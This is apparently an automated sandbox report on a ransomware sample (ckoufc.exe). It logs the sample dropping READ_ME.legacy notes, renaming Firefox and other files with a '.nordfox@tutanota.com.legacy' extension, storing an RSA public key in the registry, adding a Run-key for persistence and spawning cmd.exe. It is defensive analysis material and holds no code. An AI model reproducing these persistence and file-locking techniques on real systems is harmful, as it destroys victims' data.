Create	\Windows10Upgrade\resources\ux\EULA\EULA_zh-hk.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_zh-cn.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_uk-ua.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_tr-tr.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_th-th.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_sv-se.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_sr-latn-cs.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_sl-si.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_sk-sk.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_ru-ru.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_ro-ro.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_pt-pt.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_pt-br.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_pl-pl.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_nl-nl.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_nb-no.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_lv-lv.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_lt-lt.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_ko-kr.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_ja-jp.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_it-it.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_hu-hu.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_hr-hr.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_he-il.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_fr-fr.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_fr-ca.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_fi-fi.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_et-ee.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_es-mx.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_es-es.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_en-us.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_en-gb.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_el-gr.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_de-de.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_da-dk.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_cs-cz.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_bg-bg.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\EULA\EULA_ar-sa.htm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Oracle\Java\.oracle_jre_usage\17dfc292991c7c46.timestamp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Oracle\Java\installcache_x64\baseimagefam8	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Oracle\Java\javapath\javaws.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Oracle\Java\javapath\javaw.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Oracle\Java\javapath\java.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\packages\vcRuntimeMinimum_x86\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\packages\vcRuntimeAdditional_x86\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\packages\vcRuntimeMinimum_amd64\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\packages\vcRuntimeAdditional_amd64\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Adobe\Acrobat\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Adobe\AcroCef\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Adobe\Color\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\CEF\User Data\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Comms\Unistore\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Comms\UnistoreDB\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Google\Chrome\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Google\CrashReports\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\MicrosoftEdge\SharedCacheContainers\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\MicrosoftEdge\User\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Mozilla\Firefox\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Mozilla\updates\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\9E2F88E3.Twitter_wgeqdkkx372wm\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\ActiveSync\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\CortanaListenUIApp_cw5n1h2txyewy\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\DesktopLearning_cw5n1h2txyewy\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\DesktopView_cw5n1h2txyewy\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\EnvironmentsApp_cw5n1h2txyewy\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\HoloCamera_cw5n1h2txyewy\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\HoloItemPlayerApp_cw5n1h2txyewy\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\HoloShell_cw5n1h2txyewy\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\Microsoft.3DBuilder_8wekyb3d8bbwe\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\Microsoft.Advertising.Xaml_8wekyb3d8bbwe\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\Microsoft.Appconnector_8wekyb3d8bbwe\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\Microsoft.BingFinance_8wekyb3d8bbwe\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\Microsoft.BingNews_8wekyb3d8bbwe\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\Microsoft.BingSports_8wekyb3d8bbwe\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\Microsoft.CommsPhone_8wekyb3d8bbwe\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\Microsoft.ConnectivityStore_8wekyb3d8bbwe\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Get Info	\Users\FD1HVy\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\container.dat	type = size, size_out = 0	1	Fn
Get Info	\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\store.json.mozlz4	type = size, size_out = 66	1	Fn
Get Info	\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\state.json	type = size, size_out = 51	1	Fn
Get Info	\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\session-state.json	type = size, size_out = 161	1	Fn
Get Info	\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\upgrade.js-20170824053622	type = size, size_out = 14047	1	Fn
Get Info	\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\previous.js	type = size, size_out = 7991	1	Fn
Copy	C:\WINDOWS\ckoufc.exe	source_filename = C:\Users\FD1HVy\Desktop\ckoufc.exe	1	Fn
Move	\588bce7c90097ed212\1042\eula.rtf.1506877342345.nordfox@tutanota.com.legacy	source_filename = \588bce7c90097ed212\1042\eula.rtf, flags = MOVEFILE_WRITE_THROUGH	1	Fn
Move	\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\store.json.mozlz4.1506877342345.nordfox@tutanota.com.legacy	source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\store.json.mozlz4, flags = MOVEFILE_WRITE_THROUGH	1	Fn
Move	\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\state.json.1506877342345.nordfox@tutanota.com.legacy	source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\state.json, flags = MOVEFILE_WRITE_THROUGH	1	Fn
Move	\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\session-state.json.1506877342345.nordfox@tutanota.com.legacy	source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\session-state.json, flags = MOVEFILE_WRITE_THROUGH	1	Fn
Read	\Users\desktop.ini	size = 174, size_out = 174	1	Fn
Read	\$Recycle.Bin\S-1-5-18\desktop.ini	size = 129, size_out = 129	1	Fn
Read	\$Recycle.Bin\S-1-5-21-1051304884-625712362-2192934891-1000\desktop.ini	size = 129, size_out = 129	1	Fn
Read	\Users\Public\desktop.ini	size = 174, size_out = 174	1	Fn
Read	\Users\FD1HVy\Contacts\desktop.ini	size = 412, size_out = 412	1	Fn
Read	\Users\FD1HVy\Desktop\desktop.ini	size = 282, size_out = 282	1	Fn
Read	\Users\FD1HVy\Documents\desktop.ini	size = 402, size_out = 402	1	Fn
Read	\Users\FD1HVy\Downloads\desktop.ini	size = 282, size_out = 282	1	Fn
Read	\Users\FD1HVy\Favorites\desktop.ini	size = 402, size_out = 402	1	Fn
Read	\Users\FD1HVy\Links\desktop.ini	size = 504, size_out = 504	1	Fn
Read	\Users\FD1HVy\Music\desktop.ini	size = 504, size_out = 504	1	Fn
Read	\Users\FD1HVy\OneDrive\desktop.ini	size = 97, size_out = 97	1	Fn
Read	\Users\FD1HVy\Pictures\desktop.ini	size = 504, size_out = 504	1	Fn
Read	\Users\FD1HVy\Saved Games\desktop.ini	size = 282, size_out = 282	1	Fn
Read	\Users\FD1HVy\Searches\desktop.ini	size = 524, size_out = 524	1	Fn
Read	\Users\FD1HVy\Videos\desktop.ini	size = 504, size_out = 504	1	Fn
Read	\Users\Public\AccountPictures\desktop.ini	size = 196, size_out = 196	1	Fn
Read	\Users\Public\Desktop\desktop.ini	size = 174, size_out = 174	1	Fn
Read	\Users\Public\Documents\desktop.ini	size = 278, size_out = 278	1	Fn
Read	\Users\Public\Downloads\desktop.ini	size = 174, size_out = 174	1	Fn
Read	\Users\Public\Libraries\desktop.ini	size = 175, size_out = 175	1	Fn
Read	\Users\Public\Music\desktop.ini	size = 380, size_out = 380	1	Fn
Read	\Users\Public\Pictures\desktop.ini	size = 380, size_out = 380	1	Fn
Read	\Users\Public\Videos\desktop.ini	size = 380, size_out = 380	1	Fn
Read	\Users\FD1HVy\Documents\My Shapes\desktop.ini	size = 216, size_out = 216	1	Fn
Read	\Users\FD1HVy\Favorites\Links\desktop.ini	size = 80, size_out = 80	1	Fn
Read	\Users\FD1HVy\Pictures\Camera Roll\desktop.ini	size = 190, size_out = 190	1	Fn
Read	\Users\FD1HVy\Pictures\Saved Pictures\desktop.ini	size = 190, size_out = 190	1	Fn
Write	\Users\desktop.ini	size = 174	1	Fn
Write	\Users\desktop.ini	size = 256	1	Fn
Write	\Users\desktop.ini	size = 8	1	Fn
Write	\$Recycle.Bin\S-1-5-18\desktop.ini	size = 129	1	Fn
Write	\$Recycle.Bin\S-1-5-18\desktop.ini	size = 256	1	Fn
Write	\$Recycle.Bin\S-1-5-18\desktop.ini	size = 8	1	Fn
Write	\$Recycle.Bin\S-1-5-21-1051304884-625712362-2192934891-1000\desktop.ini	size = 129	1	Fn
Write	\$Recycle.Bin\S-1-5-21-1051304884-625712362-2192934891-1000\desktop.ini	size = 256	1	Fn
Write	\$Recycle.Bin\S-1-5-21-1051304884-625712362-2192934891-1000\desktop.ini	size = 8	1	Fn
Write	\Users\Public\desktop.ini	size = 174	1	Fn
Write	\Users\Public\desktop.ini	size = 256	1	Fn
Write	\Users\Public\desktop.ini	size = 8	1	Fn
Write	\Users\FD1HVy\Contacts\desktop.ini	size = 412	1	Fn
Write	\Users\FD1HVy\Contacts\desktop.ini	size = 256	1	Fn
Write	\Users\FD1HVy\Contacts\desktop.ini	size = 8	1	Fn
For performance reasons, the remaining 4004 entries are omitted. The remaining entries can be found in glog.xml.

Registry (8)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	value_name = ProductName, data = 87	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion	value_name = kakashka, data = 192	1	Fn
Write Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion	value_name = kakashka, data = -----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAutRy/+FJ7wB0MCJe2SJk JwTcGRDaSyg19tGc2yGWITZKbxKNX+tb5S4gPMlTuVT/lTLj3yo+DtBoZNf+0iRW tezBfT+Eud6itvehsfV8WIZHnDHKZD3Xt7mI2nYTsAXGFc2H+QRof5Xk7tZdDSjq HSt7zxSAKjsATUPQ3HbtY2oLDZg1u5FSPvGtANlTU4GmmlRp4tDe9vjvRpK7/spE NGAbPENfvnqe3aw9zMs9W/EFhuua8QTQRd0DFptTryxi6qSE9UsnlabHV5QOn3Lk ToWglU/XFIPIAFeV86qDY0fxW6lNJADIqn+25T0XZKPU9Al3YxmSyWIvT7TW1uoQ PwIDAQAB -----END PUBLIC KEY----- , size = 902, type = REG_SZ	1	Fn
Write Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run	value_name = ckoufc.exe, data = C:\WINDOWS\ckoufc.exe, size = 43, type = REG_SZ	1	Fn

Process (6)

Operation	Process	Additional Information	Count	Logfile
Create	C:\Windows\System32\cmd.exe	os_pid = 0xf04, show_window = SW_SHOWNORMAL	1	Fn
Create	C:\Windows\System32\cmd.exe	os_pid = 0x770, show_window = SW_SHOWNORMAL	1	Fn
Create	C:\Windows\System32\cmd.exe	os_pid = 0x654, show_window = SW_SHOWNORMAL	1	Fn
Create	C:\Windows\System32\cmd.exe	os_pid = 0xcdc, show_window = SW_SHOWNORMAL	1	Fn
Create	C:\Windows\System32\cmd.exe	os_pid = 0xd24, show_window = SW_SHOWNORMAL	1	Fn
Create	C:\Windows\System32\cmd.exe	os_pid = 0xd68, show_window = SW_SHOWNORMAL	1	Fn

Module (235)

Operation	Module	Additional Information	Count	Logfile
Load	KERNEL32.DLL	base_address = 0x75e90000	1	Fn
Load	ADVAPI32.dll	base_address = 0x761b0000	1	Fn
Load	CRYPT32.dll	base_address = 0x74940000	1	Fn
Load	MPR.dll	base_address = 0x73170000	1	Fn
Load	USER32.dll	base_address = 0x74b70000	1	Fn
Load	WININET.dll	base_address = 0x72ea0000	1	Fn
Load	api-ms-win-core-synch-l1-2-0	base_address = 0x74ea0000	2	Fn
Load	api-ms-win-core-fibers-l1-1-1	base_address = 0x74ea0000	2	Fn
Load	api-ms-win-core-localization-l1-2-1	base_address = 0x74ea0000	1	Fn
Load	api-ms-win-appmodel-runtime-l1-1-1	base_address = 0x75ba0000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75e90000	2	Fn
Get Handle	c:\users\fd1hvy\desktop\ckoufc.exe	base_address = 0x400000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS	1	Fn
Get Filename	-	process_name = c:\users\fd1hvy\desktop\ckoufc.exe, file_name_orig = C:\Users\FD1HVy\Desktop\ckoufc.exe, size = 260	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x75ea4610	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OutputDebugStringW, address_out = 0x75ea5d10	1	Fn
